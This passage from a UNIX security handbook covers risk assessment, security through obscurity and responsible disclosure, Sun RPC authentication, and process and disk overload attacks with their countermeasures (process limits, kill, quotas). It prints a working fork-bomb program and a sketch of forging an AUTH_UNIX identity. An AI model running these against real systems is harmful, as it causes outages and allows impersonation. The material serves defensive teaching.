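    const char *name;
    double per_year;   /* expected occurrences per year (0.01 = once per century) */
    double cost;       /* estimated cost of a single occurrence, in dollars */
};

int
main(void)
{
    struct threat threats[] = {
        { "Serious earthquake",      0.01, 250000.0 },
        { "Serious bug in sendmail", 3.00,   5000.0 },
        { "Prolonged power outage",  0.50,  20000.0 },
    };
    int i, n = sizeof(threats) / sizeof(threats[0]);

    for (i = 0; i < n; i++)
        printf("%-26s expected annual loss: $%9.2f\n",
               threats[i].name, threats[i].per_year * threats[i].cost);
    return 0;
}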

2.2.2 Review Your Risks<br />

Risk assessment should not be done only once and then forgotten. Instead, you should update your<br />

assessment periodically. In addition, the threat assessment portion should be redone whenever you have a<br />

significant change in operation or structure. Thus, if you reorganize, move to a new building, switch<br />

vendors, or undergo other major changes, you should reassess the threats and potential losses.<br />



Chapter 2
Policies and Guidelines

2.5 The Problem with Security Through Obscurity

We'd like to close this chapter on policy formation with a few words about knowledge. In traditional<br />

security, derived largely from military intelligence, there is the concept of "need to know." Information is<br />

partitioned, and you are given only as much as you need to do your job. In environments where specific<br />

items of information are sensitive or where inferential security is a concern, this policy makes<br />

considerable sense. If three pieces of information together can form a damaging conclusion and no one<br />

has access to more than two, you can ensure confidentiality.<br />

In a computer operations environment, applying the same need-to-know concept is usually not<br />

appropriate. This is especially true if you should find yourself basing your security on the fact that<br />

something technical is unknown to your attackers. This concept can even hurt your security.<br />

Consider an environment in which management decides to keep the manuals away from the users to<br />

prevent them from learning about commands and options that might be used to crack the system. Under<br />

such circumstances, the managers might believe they've increased their security, but they probably have<br />

not. A determined attacker will find the same documentation elsewhere - from other users or from other<br />

sites. Many vendors will sell copies of their documentation without requiring an executed license.<br />

Usually all that is required is a visit to a local college or university to find copies. Extensive amounts of<br />

<strong>UNIX</strong> documentation are available as close as the nearest bookstore! Management cannot close down all<br />

possible avenues for learning about the system.<br />

In the meantime, the local users are likely to make less efficient use of the machine because they are<br />

unable to view the documentation and learn about more efficient options. They are also likely to have a<br />

poorer attitude because the implicit message from management is "We don't completely trust you to be a<br />

responsible user." Furthermore, if someone does start abusing commands and features of the system,<br />

management does not have a pool of talent to recognize or deal with the problem. And if something<br />

should happen to the one or two users authorized to access the documentation, there is no one with the<br />

requisite experience or knowledge to step in or help out.<br />

Keeping bugs or features secret to protect them is also a poor approach to security. System developers<br />

often insert back doors in their programs to let them gain privileges without supplying passwords (see<br />

Chapter 11, Protecting Against Programmed Threats). Other times, system bugs with profound security<br />

implications are allowed to persist because management assumes that nobody knows of them. The<br />

problem with these approaches is that features and problems in the code have a tendency to be<br />

discovered by accident or by determined crackers. The fact that the bugs and features are kept secret<br />

means that they are unwatched, and probably unpatched. After being discovered, the existence of the<br />

problem will make all similar systems vulnerable to attack by the persons who discover the problem.<br />

Keeping algorithms secret, such as a locally developed encryption algorithm, is also of questionable<br />

value. Unless you are an expert in cryptography, you are unlikely to be able to analyze the strength of<br />

your algorithm. The result may be a mechanism that has a gaping hole in it. An algorithm that is kept<br />

secret isn't scrutinized by others, and thus someone who does discover the hole may have free access to<br />

your data without your knowledge.<br />

Likewise, keeping the source code of your operating system or application secret is no guarantee of<br />

security. Those who are determined to break into your system will occasionally find security holes, with<br />

or without source code. But without the source code, users cannot carry out a systematic examination of<br />

a program for problems.<br />

The key is attitude. If you take defensive measures that are based primarily on secrecy, you lose all your<br />

protections after secrecy is breached. You can even be in a position where you can't determine whether<br />

the secrecy has been breached, because to maintain the secrecy, you've restricted or prevented auditing<br />

and monitoring. You are better served by algorithms and mechanisms that are inherently strong, even if<br />

they're known to an attacker. The very fact that you are using strong, known mechanisms may discourage<br />

an attacker and cause the idly curious to seek excitement elsewhere. Putting your money in a wall safe is<br />

better protection than depending on the fact that no one knows that you hide your money in a mayonnaise<br />

jar in your refrigerator.<br />

2.5.1 Going Public<br />

Despite our objection to "security through obscurity," we do not advocate that you widely publicize new<br />

security holes the moment that you find them. There is a difference between secrecy and prudence! If<br />

you discover a security hole in distributed or widely available software, you should quietly report it to the<br />

vendor as soon as possible. We would also recommend that you also report it to one of the FIRST teams<br />

(described in Appendix F, Organizations). Those organizations can take action to help vendors develop<br />

patches and see that they are distributed in an appropriate manner.<br />

If you "go public" with a security hole, you endanger all of the people who are running that software but<br />

who don't have the ability to apply fixes. In the <strong>UNIX</strong> environment, many users are accustomed to<br />

having the source code available to make local modifications to correct flaws. Unfortunately, not<br />

everyone is so lucky, and many people have to wait weeks or months for updated software from their<br />

vendors. Some sites may not even be able to upgrade their software because they're running a turnkey<br />

application, or one that has been certified in some way based on the current configuration. Other systems<br />

are being run by individuals who don't have the necessary expertise to apply patches. Still others are no<br />

longer in production, or are at least out of maintenance. Always act responsibly. It may be preferable to<br />

circulate a patch without explaining or implying the underlying vulnerability than to give attackers<br />

details on how to break into unpatched systems.<br />

We have seen many instances in which a well-intentioned person reported a significant security problem<br />

in a very public forum. Although the person's intention was to elicit a rapid fix from the affected vendors,<br />

the result was a wave of break-ins to systems where the administrators did not have access to the same<br />

public forum, or were unable to apply a fix appropriate for their environment.<br />

Posting details of the latest security vulnerability in your system to the Usenet electronic bulletin board<br />

system will not only endanger many other sites, it may also open you to civil action for damages if that<br />

flaw is used to break into those sites.[8] If you are concerned with your security, realize that you're a part<br />

of a community. Seek to reinforce the security of everyone else in that community as well - and<br />

remember that you may need the assistance of others one day.<br />

[8] Although we are unaware of any cases having been filed yet on these grounds, several

lawyers have told us that they are waiting for their clients to request such an action.<br />

2.5.2 Confidential Information<br />

Some security-related information is rightfully confidential. For instance, keeping your passwords from<br />

becoming public knowledge makes sense. This is not an example of security through obscurity. Unlike a<br />

bug or a back door in an operating system that gives an attacker superuser powers, passwords are<br />

designed to be kept secret and should be routinely changed to remain so.<br />

2.5.3 Final Words: Risk Management Means Common Sense<br />

The key to successful risk assessment is to identify all of the possible threats to your system, but only to<br />

defend against those attacks which you think are realistic threats.<br />

Simply because people are the weak link doesn't mean we should ignore other safeguards. People are<br />

unpredictable, but breaking into a dial-in modem that does not have a password is still cheaper than a<br />

bribe. So, we use technological defenses where we can, and we improve our personnel security by<br />

educating our staff and users.<br />

We also rely on defense in depth: we apply multiple levels of defenses as backups in case some fail. For<br />

instance, we buy that second UPS system, or we put a separate lock on the computer room door even<br />

though we have a lock on the building door. These combinations can be defeated too, but we increase the<br />

effort and cost for an enemy to do that...and maybe we can convince them that doing so isn't worth the<br />

trouble. At the very least, you can hope to slow them down enough so that your monitoring and alarms<br />

will bring help before anything significant is lost or damaged.<br />

With these limits in mind, you need to approach computer security with a thoughtfully developed set of<br />

priorities. You can't protect against every possible threat. Sometimes you should allow a problem to<br />

occur rather than prevent it, and then clean up afterwards. For instance, your efforts might be cheaper and<br />

less trouble if you let the systems go down in a power failure and then reboot than if you bought a UPS<br />

system. And some things you simply don't bother to defend against, either because they are too unlikely<br />

(e.g., an alien invasion from space), too difficult to defend against (e.g., a nuclear blast within 500 yards<br />

of your data center), or simply too catastrophic and horrible to contemplate (e.g., your management<br />

decides to switch all your <strong>UNIX</strong> machines to a well-known PC operating system). The key to good<br />

management is knowing what things you will worry about, and to what degree.<br />

Decide what you want to protect and what the costs might be to prevent those losses versus the cost of<br />

recovering from those losses. Then make your decisions for action and security measures based on a<br />

prioritized list of the most critical needs. Be sure you include more than your computers in this analysis:<br />

don't forget that your backup tapes, your network connections, your terminals, and your documentation<br />

are all part of the system and represent potential loss. The safety of your personnel, your corporate site,<br />

and your reputation are also very important and should be included in your plans.<br />



Chapter 19
RPC, NIS, NIS+, and Kerberos

19.2 Sun's Remote Procedure Call (RPC)

The fundamental building block of all network information systems is a mechanism for performing<br />

remote procedure calls. This mechanism, usually called RPC, allows a program running on one computer<br />

to more-or-less transparently execute a function that is actually running on another computer.<br />

RPC systems can be categorized as blocking systems, which cause the calling program to cease execution<br />

until a result is returned, or as non-blocking (asynchronous) systems, in which the calling

program continues running while the remote procedure call is performed. (The results of a non-blocking<br />

RPC, if they are returned, are usually provided through some type of callback scheme.)<br />

RPC allows programs to be distributed: a computationally intensive algorithm can be run on a high-speed<br />

computer, a remote sensing device can be run on another computer, and the results can be compiled on a<br />

third. RPC also makes it easy to create network-based client/server programs: the clients and servers<br />

communicate with each other using remote procedure calls.<br />

One of the first <strong>UNIX</strong> remote procedure call systems was developed by Sun Microsystems for use with<br />

NIS and NFS. Sun's RPC uses a system called XDR (external data representation) to represent binary

information in a uniform manner and bit order. XDR allows a program running on a computer with one<br />

byte order, such as a SPARC workstation, to communicate seamlessly with a program running on a<br />

computer with an opposite byte order, such as a workstation with an Intel x86 microprocessor. RPC<br />

messages can be sent with either the TCP or UDP IP protocols (currently, the UDP version is more<br />

common). After their creation by Sun, XDR and RPC were reimplemented by the University of<br />

California at Berkeley and are now freely available.<br />
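
As a small illustration of what XDR provides, the sketch below encodes a single integer into a memory buffer using the xdrmem_create() and xdr_int() routines from the Sun RPC programming interface; the value chosen is arbitrary, and on some modern systems these routines live in a separate library (such as libtirpc) rather than in the C library itself.

/*
 * Sketch: encode one integer into XDR's canonical (big-endian) form in
 * memory.  Regardless of the host's byte order, buf ends up holding the
 * same four bytes, which is what lets unlike machines interoperate.
 */
#include <stdio.h>
#include <rpc/rpc.h>

int
main(void)
{
    XDR  xdrs;
    char buf[BYTES_PER_XDR_UNIT];   /* one XDR unit: four bytes */
    int  value = 1996;              /* arbitrary sample value */

    xdrmem_create(&xdrs, buf, sizeof(buf), XDR_ENCODE);
    if (!xdr_int(&xdrs, &value)) {
        fprintf(stderr, "xdr_int failed\n");
        return 1;
    }
    printf("encoded %d into %u XDR bytes\n", value, xdr_getpos(&xdrs));
    xdr_destroy(&xdrs);
    return 0;
}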

Sun's RPC is not unique. A different RPC system is used by the Open Software Foundation's Distributed<br />

Computing Environment (DCE). Yet another RPC system has been proposed by the Object Management<br />

Group. Called CORBA (Common Object Request Broker Architecture), this system is optimized for<br />

RPC between object-oriented programs written in C++ or SmallTalk.<br />

In the following sections, we'll discuss the Sun RPC mechanism, as it seems to be the most widely used.<br />

The continuing popularity of NFS (described in Chapter 20) suggests that Sun RPC will be in widespread<br />

use for some time to come.<br />

19.2.1 Sun's portmap/rpcbind<br />

For an RPC client to communicate with an RPC server, many things must happen:<br />

● The RPC client must be running.
● The RPC server must be running on the server machine (or it must be automatically started when the request is received).
● The client must know on which host the RPC server is located.
● The client and the server must agree to communicate on a particular TCP or UDP port.

The simplest way to satisfy this list of conditions is to have the <strong>UNIX</strong> computer start the server when the<br />

computer boots, to have the server running on a well-known host, and to have the port numbers<br />

predefined. This is the approach that <strong>UNIX</strong> takes with standard <strong>Internet</strong> services such as Telnet and<br />

SMTP.<br />

The approach that Sun took for RPC was different. Instead of having servers run on a well-known port,<br />

Sun developed a program called portmap in SunOS 4.x, which was renamed rpcbind in Solaris 2.x. We will

refer to the program as the portmapper.<br />

When an RPC server starts, it dynamically obtains a free UDP or TCP port, then registers itself with the<br />

portmapper. When a client wishes to communicate with a particular server, it contacts the portmapper<br />

process, determines the port number used by the server, and then initiates communication.<br />
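
The sequence is easiest to see from the client side. The sketch below uses the standard clnt_create() and clnt_call() routines; clnt_create() consults the portmapper on the named host to find the server's port, and the subsequent call blocks until a reply arrives or the timeout expires. The host name and program number are hypothetical, and procedure 0 is the conventional "null" procedure that most RPC servers answer.

/*
 * Sketch only: locate an RPC server through the portmapper and ping it.
 * The host "server.example.com" and program number 0x20000099 are
 * hypothetical; a real client would use the numbers assigned to the
 * service it needs.
 */
#include <stdio.h>
#include <rpc/rpc.h>

int
main(void)
{
    CLIENT *clnt;
    struct timeval timeout = { 10, 0 };   /* wait up to ten seconds */

    /* clnt_create() asks the remote portmapper which UDP port this
       program/version pair registered, then builds a client handle. */
    clnt = clnt_create("server.example.com", 0x20000099, 1, "udp");
    if (clnt == NULL) {
        clnt_pcreateerror("server.example.com");
        return 1;
    }

    /* A blocking call to procedure 0 (the null procedure): execution
       stops here until the server replies or the timeout expires. */
    if (clnt_call(clnt, 0, (xdrproc_t) xdr_void, NULL,
                  (xdrproc_t) xdr_void, NULL, timeout) != RPC_SUCCESS)
        clnt_perror(clnt, "call failed");

    clnt_destroy(clnt);
    return 0;
}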

The portmapper approach has the advantage that you can have many more RPC services (in theory, 2^32) than there are IP port numbers (2^16).[2] In practice, however, the greater availability of RPC server numbers has not been very important. Indeed, one of the most widely used RPC services, NFS, usually has a fixed UDP port of 2049.

[2] Of course, you can't really have 2^32 RPC services, because there aren't enough programmers to write them, or enough computers and RAM for them to run. The reason for having 2^32 different RPC service numbers available was that different vendors could pick RPC numbers without the possibility of conflict. A better way to have reached this goal would have been to allow RPC services to use names, so that companies and organizations could have registered their RPC services using their names as part of the service names - but the designers didn't ask us.

The portmapper program also complicates building <strong>Internet</strong> firewalls, because you almost never know in<br />

advance the particular IP port that will be used by RPC-based services.<br />

19.2.2 RPC Authentication<br />

Client programs contacting an RPC server need a way to authenticate themselves to the server, so that the<br />

server can determine what information the client should be able to access, and what functions should be<br />

allowed. Without authentication, any client on the network that can send packets to the RPC server could<br />

access any function.<br />

There are several different forms of authentication available for RPC, as described in Table 19.1. Not all<br />

authentication systems are available in all versions of RPC:<br />

Table 19.1: RPC Authentication Options

System        Authentication Technique                   Comments
AUTH_NONE     None                                       No authentication. Anonymous access.
AUTH_UNIX[3]  RPC client sends the UNIX UID and GIDs     Not secure. Server implicitly trusts that the
              for the user.                              user is who the user claims to be.
AUTH_DES      Authentication based on public key         Reasonably secure, although not widely
              cryptography and DES                       available from manufacturers other than Sun.
AUTH_KERB     Authentication based on Kerberos           Very secure, but requires that you set up a
                                                         Kerberos server (described later in this
                                                         chapter). As with AUTH_DES, AUTH_KERB
                                                         is not widely available.

[3] AUTH_UNIX is called AUTH_SYS in at least one version of Sun Solaris.

19.2.2.1 AUTH_NONE<br />

Live fast, die young. AUTH_NONE is bare-bones RPC with no user authentication. You might use it for<br />

services that require and provide no useful information, such as time of day. On the other hand, why do<br />

you want other computers on the network to be able to find out the setting of your system's time-of-day

clock? (Furthermore, because the system's time of day is used in a variety of cryptographic protocols,<br />

even that information might be usable in an attack against your computer.)<br />

19.2.2.2 AUTH_<strong>UNIX</strong><br />

AUTH_<strong>UNIX</strong> was the only authentication system provided by Sun through Release 4.0 of the SunOS<br />

operating systems, and it is the only form of RPC authentication offered by many <strong>UNIX</strong> vendors. It is<br />

widely used. Unfortunately, it is fundamentally insecure.

With AUTH_UNIX, each RPC request is accompanied by a UID and a set of GIDs[4] for

authentication. The server implicitly trusts the UID and GIDs presented by the client, and uses this

information to determine if the action should be allowed or not. Anyone with access to the network can<br />

craft an RPC packet with any arbitrary values for UID and GID. Obviously, AUTH_<strong>UNIX</strong> is not secure,<br />

because the client is free to claim any identity, and there is no provision for checking on the part of the<br />

server.<br />

[4] Some versions of RPC present eight additional GIDs, while others present up to 16.<br />

In recent years, Sun has changed the name AUTH_<strong>UNIX</strong> to AUTH_SYS. Nevertheless, it's still the same<br />

system.<br />
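
The weakness is easy to see from the client-side interface: the credential is manufactured entirely by the caller with the standard authunix_create() routine, and the server simply believes whatever it contains. In the sketch below the host names, program number, and the claimed UID and GID are all hypothetical.

/*
 * Sketch: an AUTH_UNIX credential contains whatever the client chooses
 * to claim.  The host names, program number, UID, and GID below are
 * hypothetical; nothing on the server side verifies them.
 */
#include <rpc/rpc.h>

int
main(void)
{
    CLIENT *clnt;
    gid_t   groups[1] = { 100 };

    clnt = clnt_create("server.example.com", 0x20000099, 1, "udp");
    if (clnt == NULL)
        return 1;

    /* Discard the default credential and attach a client-chosen one;
       the UID (1234) and GID (100) are simply asserted. */
    auth_destroy(clnt->cl_auth);
    clnt->cl_auth = authunix_create("client.example.com", 1234, 100, 1, groups);

    /* ... any clnt_call() made now carries that claimed identity ... */

    auth_destroy(clnt->cl_auth);
    clnt_destroy(clnt);
    return 0;
}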

19.2.2.3 AUTH_DES<br />

AUTH_DES is the basis of Sun's "<strong>Sec</strong>ure RPC" (described later in this chapter). AUTH_DES uses a<br />

combination of secret key and public key cryptography to allow security in a networked environment. It<br />

was developed several years after AUTH_<strong>UNIX</strong>, and is not widely available on <strong>UNIX</strong> platforms other<br />

than Sun's SunOS and Solaris 2.x operating systems.<br />

19.2.2.4 AUTH_KERB<br />

AUTH_KERB is a modification to Sun's RPC system that allows it to interoperate with MIT's Kerberos<br />

system for authentication. Although Kerberos was developed in the mid 1980s, AUTH_KERB<br />

authentication for RPC was not incorporated into Sun's RPC until the early 1990s.<br />

NOTE: Carefully review the RPC services that are configured into your system for<br />

automatic start when the system boots, or for automatic dispatch from the inetd (see Chapter<br />

17, TCP/IP Services). If you don't need a service, disable it.<br />

In particular, if your version of the rexd service cannot be forced into only accepting<br />

connections authenticated with Kerberos or <strong>Sec</strong>ure RPC, then it should be turned off. The<br />

rexd daemon (which executes commands issued with the on command) otherwise is easily<br />

fooled into executing commands on behalf of any non-root user.<br />



Chapter 25
Denial of Service Attacks and Solutions

25.2 Overload Attacks

In an overload attack, a shared resource or service is overloaded with requests to such a point that it's unable to satisfy<br />

requests from other users. For example, if one user spawns enough processes, other users won't be able to run processes of<br />

their own. If one user fills up the disks, other users won't be able to create new files. You can partially protect against<br />

overload attacks by partitioning your computer's resources, and limiting each user to one partition. Alternatively, you can<br />

establish quotas to limit each user. Finally, you can set up systems for automatically detecting overloads and restarting your<br />

computer.<br />

25.2.1 Process-Overload Problems<br />

One of the simplest denial of service attacks is a process attack. In a process attack, one user makes a computer unusable for<br />

others who happen to be using the computer at the same time. Process attacks are generally of concern only with shared<br />

computers: the fact that a user incapacitates his or her own workstation is of no interest if nobody else is using the machine.<br />

25.2.1.1 Too many processes<br />

The following program will paralyze or crash many older versions of <strong>UNIX</strong>:<br />

main()
{
    while (1)
        fork();
}

When this program is run, the process executes the fork() instruction, creating a second process identical to the first. Both<br />

processes then execute the fork() instruction, creating four processes. The growth continues until the system can no longer<br />

support any new processes. This is a total attack, because all of the child processes are waiting for new processes to be<br />

established. Even if you were somehow able to kill one process, another would come along to take its place.<br />

This attack will not disable most current versions of <strong>UNIX</strong>, because of limits on the number of processes that can be run<br />

under any UID (except for root). This limit, called MAXUPROC, is usually configured into the kernel when the system is<br />

built. Some <strong>UNIX</strong> systems allow this value to be set at boot time; for instance, Solaris allows you to put the following in your<br />

/etc/system file:<br />

set maxuproc=100<br />
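
On systems that support the BSD-style resource-limit interface, a program can also inspect the per-user process ceiling it is running under with getrlimit(). This is a minimal sketch; it assumes your system defines RLIMIT_NPROC, which not every UNIX variant does.

/*
 * Sketch: report the per-user process limit.  Assumes RLIMIT_NPROC is
 * available (BSD-derived and most modern systems); it is not defined on
 * every UNIX variant.
 */
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>

int
main(void)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NPROC, &rl) == -1) {
        perror("getrlimit");
        return 1;
    }
    printf("process limit: soft %lu, hard %lu\n",
           (unsigned long) rl.rlim_cur, (unsigned long) rl.rlim_max);
    return 0;
}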

A user employing this attack will use up his quota of processes, but no more. As superuser, you will then be able to use the ps<br />

command to determine the process numbers of the offending processes and use the kill command to kill them. You cannot kill<br />

the processes one by one, because the remaining processes will simply create more. A better approach is to use the kill<br />

command to first stop each process, then kill them all at once:<br />

# kill -STOP 1009 1110 1921<br />

# kill -STOP 3219 3220<br />

.<br />

.<br />

.<br />

# kill -KILL 1009 1110 1921 3219 3220...<br />

Because the stopped processes still come out of the user's NPROC quota, the forking program will be able to spawn no more.<br />

You can then deal with the author.<br />

Alternatively, you can kill all the processes in a process group at the same time; in many cases of a user spawning too many<br />

processes, the processes will all be in the same process group. To discover the process group, run the ps command with the -j<br />

option. Identify the process group, and then kill all processes with one fell swoop:<br />

# kill -9 -1009<br />

Note that many older, AT&T-derived systems do not support either process groups or the enhanced version of the kill<br />

command, but it is present in SVR4. This enhanced version of kill interprets the second argument as indicating a process<br />

group if it is preceded by a "-", and the absolute value of the argument is used as the process group; the indicated signal is<br />

sent to every process in the group.<br />
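
The same effect is available from a program: a negative first argument to the kill() system call addresses every process in the group. The process-group ID below is hypothetical; in practice you would take it from the ps -j output described above.

/*
 * Sketch: kill an entire process group from a program.  The group ID
 * 1009 is hypothetical; in practice you would take it from ps -j.
 */
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>

int
main(void)
{
    pid_t pgid = 1009;              /* process group reported by ps -j */

    /* A negative pid argument means "every process in group |pid|". */
    if (kill(-pgid, SIGKILL) == -1) {
        perror("kill");
        return 1;
    }
    return 0;
}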

Under modern versions of <strong>UNIX</strong>, the root user can still halt the system with a process attack because there is no limit to the<br />

number of processes that the superuser can spawn. However, the superuser can also shut down the machine or perform almost<br />

any other act, so this is not a major concern - except when root is running a program that is buggy (or booby-trapped). In<br />

these cases, it's possible to encounter a situation in which the machine is overwhelmed to the point where no one else can get<br />

a free process even to do a login.<br />

There is also a possibility that your system may reach the total number of allowable processes because so many users are<br />

logged on, even though none of them has reached her individual limit.<br />

One other possibility is that your system has been configured incorrectly. Your per-user process limit may be equal to or<br />

greater than the limit for all processes on the system. In this case, a single user can swamp the machine.<br />

If you are ever presented with an error message from the shell that says "No more processes," then either you've created too<br />

many child processes or there are simply too many processes running on the system; the system won't allow you to create any<br />

more processes.<br />

For example:<br />

% ps -efj
No more processes
%

If you run out of processes, wait a moment and try again. The situation may have been temporary. If the process problem does<br />

not correct itself, you have an interesting situation on your hands.<br />

Having too many processes that are running can be very difficult to correct without rebooting the computer; there are two<br />

reasons why:<br />

●<br />

●<br />

You cannot run the ps command to determine the process numbers of the processes to kill.<br />

If you are not currently the superuser, you cannot use the su or login command, because both of these functions require<br />

the creation of a new process.<br />

One way around the second problem is to use the shell's exec[1] built-in command to run the su command without creating a<br />

new process:<br />

[1] The shell's exec function causes a program to be run (with the exec() system call) without a fork() system call<br />

being executed first; the user-visible result is that the shell runs the program and then exits.<br />

% exec /bin/su<br />

password: foobar<br />

#<br />

Be careful, however, that you do not mistype your password or exec the ps program: the program will execute, but you will<br />

then be automatically logged out of your computer!<br />

If you have a problem with too many processes saturating the system, you may be forced to reboot the system. The simplest<br />

way might seem to be to power-cycle the machine. However, this may damage blocks on disk, because it will probably not<br />

flush active buffers to disk - few systems are designed to undergo an orderly shutdown when powered off suddenly. It's better<br />

to use the kill command to kill the errant processes or to bring the system to single-user mode. (See Appendix C, <strong>UNIX</strong><br />

Processes for information about kill, ps, <strong>UNIX</strong> processes, and signals.)<br />

On most modern versions of <strong>UNIX</strong>, the superuser can send a SIGTERM signal to all processes except system processes and<br />

your own process by typing:<br />

# kill -TERM -1<br />

#<br />

If your <strong>UNIX</strong> system does not have this feature, you can execute the command:<br />

# kill -TERM 1<br />

#<br />

to send a SIGTERM to the init process. <strong>UNIX</strong> automatically kills all processes and goes to single-user mode when init dies.<br />

You can then execute the sync command from the console and reboot the operating system.<br />

If you get the error "No more processes" when you attempt to execute the kill command, exec a version of the ksh or csh -<br />

they have the kill command built into them and therefore don't need to spawn an extra process to run the command.<br />

25.2.1.2 System overload attacks

Another common process-based denial of service occurs when a user spawns many processes that consume large amounts of CPU. As most UNIX systems use a form of simple round-robin scheduling, these overloads reduce the total amount of CPU time available to all other users. For example, someone who dispatches ten find commands with grep components throughout your Usenet directories, or spawns a dozen large troff jobs, can slow the system to a crawl.[2]

[2] We resist using the phrase commonly found on the net of "bringing the system to its knees." UNIX systems have many interesting features, but knees are not among them. How the systems manage to crawl, then, is left as an exercise to the reader.

The best way to deal with these problems is to educate your users about how to share the system fairly. Encourage them to use the nice command to reduce the priority of their background tasks, and to run them a few at a time. They can also use the at or batch command to defer execution of lengthy tasks to a time when the system is less crowded. You'll need to be more forceful with users who intentionally or repeatedly abuse the system.

If your system is exceptionally loaded, log in as root and set your own priority as high as you can right away with the renice command, if it is available on your system:[3]

[3] In this case, your login may require a lot of time; renice is described in more detail in Appendix C.

# renice -19 $$
#

Then, use the ps command to see what's running, followed by the kill command to remove the processes monopolizing the system, or the renice command to slow down those processes.
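A minimal sketch of that sequence appears below. The ps flags and column positions are assumptions (they differ between BSD- and System V-derived systems), and the process ID 12345 is purely illustrative:

# ps aux | sort -rn -k3 | head -10   # the ten processes using the most CPU (BSD-style ps)
# renice 19 12345                    # slow the offender down...
# kill -TERM 12345                   # ...or remove it entirely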

25.2.2 Disk Attacks

Another way of overwhelming a system is to fill a disk partition. If one user fills up the disk, other users won't be able to create files or do other useful work.

25.2.2.1 Disk-full attacks

A disk can store only a certain amount of information. If your disk is full, you must delete some information before more can be stored.

Sometimes disks fill up suddenly when an application program or a user erroneously creates too many files (or a few files that are too large). Other times, disks fill up because many users are slowly increasing their disk usage.

The du command lets you find the directories on your system that contain the most data. du searches recursively through a tree of directories and lists how many blocks are used by each one. For example, to check the entire /usr partition, you could type:

# du /usr
29      /usr/dict/papers
3875    /usr/dict
8       /usr/pub
...
4032    /usr
#

By finding the larger directories, you can decide where to focus your cleanup efforts.

You can also use the find command with the -size option to list only the files larger than a certain size. Additionally, you can use the -xdev or -local option to avoid searching NFS-mounted directories (although you will want to run find on each NFS server). This method is about as fast as doing a du and can be even more useful when you are trying to find a few large files that are taking up space. For example:

# find /usr -size +1000 -exec ls -l {} \;
-rw-r--r--  1 root    1819832 Jan  9 10:45 /usr/lib/libtext.a
-rw-r--r--  1 root    2486813 Aug 10  1985 /usr/dict/web2
-rw-r--r--  1 root    1012730 Aug 10  1985 /usr/dict/web2a
-rwxr-xr-x  1 root     589824 Oct 22 21:27 /usr/bin/emacs
-rw-r--r--  1 root    7323231 Oct 31  1990 /usr/tex/TeXdist.tar.Z
-rw-rw-rw-  1 root     772092 Mar 10 22:12 /var/spool/mqueue/syslog
-rw-r--r--  1 uucp    1084519 Mar 10 22:12 /var/spool/uucp/LOGFILE
-r--r--r--  1 root     703420 Nov 21 15:49 /usr/tftpboot/mach
...
#

In this example, the file /usr/tex/TeXdist.tar.Z is probably a candidate for deletion - especially if you have already unpacked the TeX distribution. The files /var/spool/mqueue/syslog and /var/spool/uucp/LOGFILE are also good candidates to delete, after saving them to tape or another disk.

25.2.2.2 quot command

The quot command lets you summarize filesystem usage by user; this program is available on some System V and on most Berkeley-derived systems. With the -f option, quot prints the number of blocks and the number of files used by each user:

# quot -f /dev/sd0a
/dev/sd0a (/):
53698  4434  root
 4487   294  bin
  681   155  hilda
  319   121  daemon
  123    25  uucp
   24     1  audit
   16     1  mailcmd
   16     1  news
    6     7  operator
#

You do not need to have disk quotas enabled to run the quot -f command.

NOTE: The quot -f command may lock the device while it is running. All other programs that need to access the device will be blocked until the quot -f command completes.

25.2.2.3 Inode problems

The UNIX filesystem uses inodes to store information about files. One way to make a disk unusable is to consume all of the free inodes on it, so that no new files can be created. A person might inadvertently do this by creating thousands of empty files. This can be a perplexing problem to diagnose if you're not aware of the potential, because the df command might show lots of available space, yet attempts to create a file result in a "no space" error. In general, each new file, directory, pipe, FIFO, or socket requires an inode on disk to describe it. If the supply of available inodes is exhausted, the system can't allocate a new file even if disk space is available.

You can tell how many inodes are free on a disk by issuing the df command with the -o i option (this may be df -i on some systems):

% df -o i /usr
Filesystem           iused   ifree  %iused  Mounted on
/dev/dsk/c0t3d0s5    20100   89404     18%  /usr
%

The output shows that this disk has lots of inodes available for new files.

The number of inodes in a filesystem is usually fixed at the time you initially format the disk for use. The default created for the partition is usually appropriate for normal use, but you can override it to provide more or fewer inodes, as you wish. You may wish to increase this number for partitions that hold many small files - for example, a partition that holds Usenet news (e.g., /var/spool/news). If you run out of inodes on a filesystem, about the only recourse is to save the disk to tape, reformat with more inodes, and then restore the contents.
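A hedged sketch of that last procedure follows; the dump/restore usage, the -i value (bytes per inode - a smaller value yields more inodes), and the device and tape names are assumptions for a BSD-style system and must be adapted to your own:

# dump 0f /dev/rmt/0 /var/spool/news        # save the filesystem to tape
# newfs -i 1024 /dev/rdsk/c0t2d0s6          # remake it with more inodes
# mount /dev/dsk/c0t2d0s6 /var/spool/news
# cd /var/spool/news && restore rf /dev/rmt/0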

25.2.2.4 Using partitions to protect your users

You can protect your system from disk attacks by dividing your hard disk into several smaller partitions and placing different users' home directories on different partitions. In this manner, if one user fills up one partition, users on the other partitions won't be affected. (Drawbacks of this approach include needing to move directories to different partitions if they require more space, and an inability to hard-link files between some user directories.)

25.2.2.5 Using quotas

A more effective way to protect your system from disk attacks is to use the quota system that is available on most modern versions of UNIX. (Quotas are usually available as a build-time or run-time option on POSIX systems.)

With disk quotas, each user can be assigned a limit on how many inodes and how many disk blocks that user can use. There are two basic kinds of quotas:

● Hard quotas are absolute limits on how many inodes and how much space the user may consume.

● Soft quotas are advisory. Users are allowed to exceed soft quotas for a grace period of several days. During this time, the user is issued a warning whenever he or she logs into the system. After the final day, the user is not allowed to create any more files (or use any more space) without first reducing current usage.

A few systems also support a group quota, which allows you to set a limit on the total space used by a whole group of users. This can result in cases where one user can deny another the ability to store a file if they are in the same group, so it is an option you may not wish to use.

To enable quotas on your system, you first need to create the quota summary file. This file is usually named quotas, and it is located in the top-level directory of the disk. Thus, to set quotas on the /home partition, you would issue the following commands:[4]

[4] If your system supports group quotas, the file will be named something else, such as quotas.user or quotas.group.

# cp /dev/null /home/quotas
# chmod 600 /home/quotas
# chown root /home/quotas

You also need to mark the partition as having quotas enabled. You do this by changing the filesystem table in your /etc directory; depending on the system, this may be /etc/fstab, /etc/vfstab, /etc/checklist, or /etc/filesystems. If the options field is currently rw, you will change it to rq; otherwise, you probably need to add a quota option.[5] Then you need to build the quota tables on every disk. This process is done with the quotacheck -a command. (If your version of quotacheck takes the -p option, you may wish to use it to make the checks faster.) Note that if there are any active users on the system, this check may produce incorrect values. Thus, we advise that you reboot; the quotacheck command should run as part of the standard boot sequence and will check all the filesystems you enabled.

